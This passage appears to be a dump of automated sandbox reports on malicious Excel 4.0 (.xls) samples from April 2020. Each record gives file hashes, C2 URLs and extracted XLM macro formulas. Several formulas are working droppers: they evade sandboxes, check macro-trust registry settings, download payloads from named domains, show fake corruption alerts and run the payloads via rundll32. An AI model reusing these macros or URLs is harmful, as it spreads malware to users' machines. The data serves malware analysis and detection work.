,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BQX0UKXzJ8\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d5b819086460a976ebf526568e59eccb85d98547ab054a1785595940aa0eadd"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d5b819086460a976ebf526568e59eccb85d98547ab054a1785595940aa0eadd","filesize":113152,"md5":"eac4c8954197cf2096cc30f460182cb4","sha1":"d65f16a5aad5acb7aa9dcefad52fcb6530758832","sha256":"8d5b819086460a976ebf526568e59eccb85d98547ab054a1785595940aa0eadd","sha512":"da967b1cdd100cf3e7aa71ca77421412a9aa83629bef811c749a5e5ec4ebdb4b0095d4229bfd7380f436a97b7a84ef12413feedb753792828ecc71aa748d9288","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d5b819086460a976ebf526568e59eccb85d98547ab054a1785595940aa0eadd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/vdjfvfs7871f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"SRMV9jDKI0\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d5eb92c0a65848ad528975060628d8467443ead846fb9762c82a79f82505d0c"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d5eb92c0a65848ad528975060628d8467443ead846fb9762c82a79f82505d0c","filesize":185344,"md5":"14d576a5e3c38a37f7113e23cb9ec6d2","sha1":"de1a481db6ae4616f6685ee9c2540b7b813a9117","sha256":"8d5eb92c0a65848ad528975060628d8467443ead846fb9762c82a79f82505d0c","sha512":"116f52291be71477902175df7d89ce9f8f03f576de8ec8168282838dde65064d95ada7d65ced8fe588f259cb1af659f181f3c9f70140a6f3f0b1e85ad47f43de","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d5eb92c0a65848ad528975060628d8467443ead846fb9762c82a79f82505d0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d6843da1597c254f5302d2cc405c4bab8299f262592dc4a69d5cf980215dbce"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d6843da1597c254f5302d2cc405c4bab8299f262592dc4a69d5cf980215dbce","filesize":112128,"md5":"313826f2dc7a1801e6e60c3118e622a7","sha1":"4f380e804debc25cbedee95fd45cfa7222b9c3f0","sha256":"8d6843da1597c254f5302d2cc405c4bab8299f262592dc4a69d5cf980215dbce","sha512":"241ca8585941b7da2fb14705901602835c2ddc0cac67ae910b1996cd44a3e4513f09924ead8ebecc5d708bdb6388001003e42e2d17bf8a01a7afd13af34483ec","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d6843da1597c254f5302d2cc405c4bab8299f262592dc4a69d5cf980215dbce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d754d0e5e48741a9083d48765402a90e1b4826154aa1549b630679132653846"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d754d0e5e48741a9083d48765402a90e1b4826154aa1549b630679132653846","filesize":185344,"md5":"2b53ea972cde663265e85d5f17d93e8d","sha1":"bf50940a5308e19cf482975a2b9a2dc1a93ebcc8","sha256":"8d754d0e5e48741a9083d48765402a90e1b4826154aa1549b630679132653846","sha512":"4ca5d96225e4273dfc10d116e12eff48d9efb17ddb7f07630b3e4bd8a55cd5042712ded49807d7b616b1c4cefed15fbb387fecc202c2feaf2ab21a03a23d4559","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d754d0e5e48741a9083d48765402a90e1b4826154aa1549b630679132653846.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d82ae16ea57c3e391a4c41283baf487339c1ba703ac225ea33c582222987b40"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d82ae16ea57c3e391a4c41283baf487339c1ba703ac225ea33c582222987b40","filesize":185344,"md5":"16c7d0d1fddf60889bfd7e1d4696d027","sha1":"fbae70c16f19696234dc2428b3768ee1a7074a8e","sha256":"8d82ae16ea57c3e391a4c41283baf487339c1ba703ac225ea33c582222987b40","sha512":"95aee76cf1a47838b7f0f67c6195f42347ac4a7652d54703bffdd8fa8155a97c5d88a2f6c5e08e034bf3b7001d2e1c0ac1adb7404081ba43525f94d8c4c499c2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d82ae16ea57c3e391a4c41283baf487339c1ba703ac225ea33c582222987b40.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d8dea28a4f868ab6484e689ab6dd00d9f5b54c2cefd34a19797c72283692ec2"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d8dea28a4f868ab6484e689ab6dd00d9f5b54c2cefd34a19797c72283692ec2","filesize":209408,"md5":"f7c1053cc391f58aa3cb5e8a7c29a3c1","sha1":"af0b4aeab754e03f7b85b9b6cc89f6212beb2f17","sha256":"8d8dea28a4f868ab6484e689ab6dd00d9f5b54c2cefd34a19797c72283692ec2","sha512":"03a7f8b59ea9eb8c5756d935ca06687fb81afc7c5b80a4934d7a7e63665b686a09e877696ff27ee552b61b2b6fd1af6b0f25ae57ad9a9c0b6fdd0664b4f6f9c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d8dea28a4f868ab6484e689ab6dd00d9f5b54c2cefd34a19797c72283692ec2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iDEYu9GLAN\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8da849b834cd1633e1f9324b2d96629cd39047906113d2884828583ddf52ad6d"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8da849b834cd1633e1f9324b2d96629cd39047906113d2884828583ddf52ad6d","filesize":168448,"md5":"4242c27769a0d9b77012a504848a6240","sha1":"2fb49d1a4459ae25aff712d4bbc0a49803fb1634","sha256":"8da849b834cd1633e1f9324b2d96629cd39047906113d2884828583ddf52ad6d","sha512":"dd034773ecd890f9ca555e66b6aa571c078f443c7bb06abc0ccebe2894acc25368d36f4114121acfb7251d29678ce8f7ccdf6a21464025815c66bf6b3bffaf2d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8da849b834cd1633e1f9324b2d96629cd39047906113d2884828583ddf52ad6d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KIhn7BzFU5\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8da9ef22bf2362399ddef1279ad4ea633c2737fa72745dc781905282f0a79b14"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8da9ef22bf2362399ddef1279ad4ea633c2737fa72745dc781905282f0a79b14","filesize":152576,"md5":"4a9727784a4cdda5643a3cf82c0e808e","sha1":"4296431fd2d5082ae4a7e794e7ff0915f6224f76","sha256":"8da9ef22bf2362399ddef1279ad4ea633c2737fa72745dc781905282f0a79b14","sha512":"12f5fa2f80a2b020af671a1d96ede5160f3d121a5b8d94ed6ba0f48de82c4d57c7c009a126e08c0d6ab1c851e22325e76a4305ebf129757168bb405bbc2a8eac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8da9ef22bf2362399ddef1279ad4ea633c2737fa72745dc781905282f0a79b14.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KxpbADlLBC\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8dc53d64c9e72ef2b381898f4dd23d3bb09d60362ce290dbe3214de3329bba56"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8dc53d64c9e72ef2b381898f4dd23d3bb09d60362ce290dbe3214de3329bba56","filesize":185344,"md5":"25acecfaf5255fb2a3177a5c5ca55ba9","sha1":"d0e29015485a81fedd44f03c837527035e2fec9e","sha256":"8dc53d64c9e72ef2b381898f4dd23d3bb09d60362ce290dbe3214de3329bba56","sha512":"bd5106b8081af32d70a84e5e494e88181f3a3e4ee0c1720529bc756af9af475b04de89abd2d4630afb59092f2cf2466dbdabd09f8a9b758e89870ba7ab3ca9f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8dc53d64c9e72ef2b381898f4dd23d3bb09d60362ce290dbe3214de3329bba56.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ddd852ed024599b519f37d4ecb4ab0ab9c873ea6794bb50d367a4a4523e6ece"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8ddd852ed024599b519f37d4ecb4ab0ab9c873ea6794bb50d367a4a4523e6ece","filesize":214528,"md5":"6ff9dfffc0cd41d9e8a35fc99d46e60d","sha1":"6a133764ae390d20a2e962ef47f40a9b67e46c2d","sha256":"8ddd852ed024599b519f37d4ecb4ab0ab9c873ea6794bb50d367a4a4523e6ece","sha512":"38a2ac175ae3898af3e7504b77d5893ae00fcbeccdd3fba32b65bcf5c012975dd21f59af061b815f301bfa1239d526f3b8d76ffc371b92ba6f0f5e3545de9f38","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ddd852ed024599b519f37d4ecb4ab0ab9c873ea6794bb50d367a4a4523e6ece.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AGF1jxxLgN\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8de325b7331f3617a877eb2e7491beaf07eaee0e185fca631c8fe9786351a116"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8de325b7331f3617a877eb2e7491beaf07eaee0e185fca631c8fe9786351a116","filesize":185344,"md5":"739ee5bd58bd2d458835300220afde26","sha1":"eb0e84c6ea87e231714563552987ef4b3f981c70","sha256":"8de325b7331f3617a877eb2e7491beaf07eaee0e185fca631c8fe9786351a116","sha512":"3febbccbcd4003d41da4d45ad7078d313fb0059d1e1f4ce35c092d67e5312ea79709ff6cfbff987c1c4b1e88821a27cfcd9f401c31f3b2d5040620c7a4e95a3b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8de325b7331f3617a877eb2e7491beaf07eaee0e185fca631c8fe9786351a116.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8dfe4dfe69d1bc340af3847b0450dcab909a60a1eb57292c1c5b42b0eb7536ea"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8dfe4dfe69d1bc340af3847b0450dcab909a60a1eb57292c1c5b42b0eb7536ea","filesize":168960,"md5":"07782a1d08119459cb121b3772cc45aa","sha1":"39138056d83faf857fb9a850f4e0d713cdd3b74c","sha256":"8dfe4dfe69d1bc340af3847b0450dcab909a60a1eb57292c1c5b42b0eb7536ea","sha512":"2cb249f9c777391a062028d16040341d3cd2b3bf12da08edc43cd80ede0b3fee997211aa883627aa47ffc747c1572a1f52e657fbe39ef367c6e10eb774e090f5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8dfe4dfe69d1bc340af3847b0450dcab909a60a1eb57292c1c5b42b0eb7536ea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"J9DTYXh4KR\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e1349885c931b2ae9def0ad5edc3fcc49d46fb7fb071670d0ac7fc77bf47608"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8e1349885c931b2ae9def0ad5edc3fcc49d46fb7fb071670d0ac7fc77bf47608","filesize":206336,"md5":"fb86650135224c65680e20a74c47f5e9","sha1":"e3bc0e2840682f00b07330b3778ad2bb97b2adc3","sha256":"8e1349885c931b2ae9def0ad5edc3fcc49d46fb7fb071670d0ac7fc77bf47608","sha512":"ce95f9685b31cd34437ad9e07d9367e415ed71e5a7eb297fccad245e896f0fb5d223cf9fd3d9dea6006e81de7f1f1f95bf6b13e007d162111509130a0ea76a95","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e1349885c931b2ae9def0ad5edc3fcc49d46fb7fb071670d0ac7fc77bf47608.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vYxuO8AWBr\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e1670fd53f130ba5a228b1413ff56238a929d9f4160836d1d10b45b456558a0"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e1670fd53f130ba5a228b1413ff56238a929d9f4160836d1d10b45b456558a0","filesize":185344,"md5":"3668cb3a8fad4d941fa023088deb260f","sha1":"8cd77588170cdf9adea152086be51d2155cf4f2e","sha256":"8e1670fd53f130ba5a228b1413ff56238a929d9f4160836d1d10b45b456558a0","sha512":"52c3e59a95d21c81f2d318a2e65be3c99254f10ebbcf5710732f8b71c17cf68829b230094f4801692e10fcc773a097e8976bbe5be495f933cf44a28cdb1d1eac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e1670fd53f130ba5a228b1413ff56238a929d9f4160836d1d10b45b456558a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e220fa93e3c0c6a121ee152b0dc57804ef828e01962cded17acda67a7bbda28"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e220fa93e3c0c6a121ee152b0dc57804ef828e01962cded17acda67a7bbda28","filesize":185344,"md5":"4f28a9cdb550dd8664d794e639d3869b","sha1":"fe4d03f79da842310d2f3b05c6ff655aa843fd1f","sha256":"8e220fa93e3c0c6a121ee152b0dc57804ef828e01962cded17acda67a7bbda28","sha512":"54a9b736e23977099d192779c187a1269507d2858626955357c9f219fde458b7dfee3db482f149232b470822b6a71338b2fd0734c1bfb082f003ff69f66489e2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e220fa93e3c0c6a121ee152b0dc57804ef828e01962cded17acda67a7bbda28.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e2ba01d49c6f758c6050804eed7f3bb720fe8b99bd2864316b426a778adbce2"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e2ba01d49c6f758c6050804eed7f3bb720fe8b99bd2864316b426a778adbce2","filesize":147968,"md5":"dea9e7f19ab2fe653adf771a44d537de","sha1":"2abc5e4b1a8058ce2d57c76db49dd5e4e6587d73","sha256":"8e2ba01d49c6f758c6050804eed7f3bb720fe8b99bd2864316b426a778adbce2","sha512":"76322ab6e01a952053c480ad56f764bd8669bb11665cdd6594a02694ef06daeb58c8cb43708195892ce1ba1f110d628901b83e0cd4ca70f53d0775458912e55d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e2ba01d49c6f758c6050804eed7f3bb720fe8b99bd2864316b426a778adbce2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"tik9g9uVL8\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e2ff30ddc663da85e82419bb92faf5b19dc82ab3d0327b7030c68e9545a843e"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e2ff30ddc663da85e82419bb92faf5b19dc82ab3d0327b7030c68e9545a843e","filesize":214528,"md5":"0f2b20e5c5a936e14e2c164802e4ea58","sha1":"19e0581859f467f22502155f4b172f2a964e1110","sha256":"8e2ff30ddc663da85e82419bb92faf5b19dc82ab3d0327b7030c68e9545a843e","sha512":"f7c776a9841bc6fc56246916487ecf07d2b4f179d497bcf5ac31ddfe3c1e3b4be52c001b406b746b1dea5ac4d45fa1e1afcdfe2f2953ec7fb7d6d29fca2a2190","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e2ff30ddc663da85e82419bb92faf5b19dc82ab3d0327b7030c68e9545a843e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg 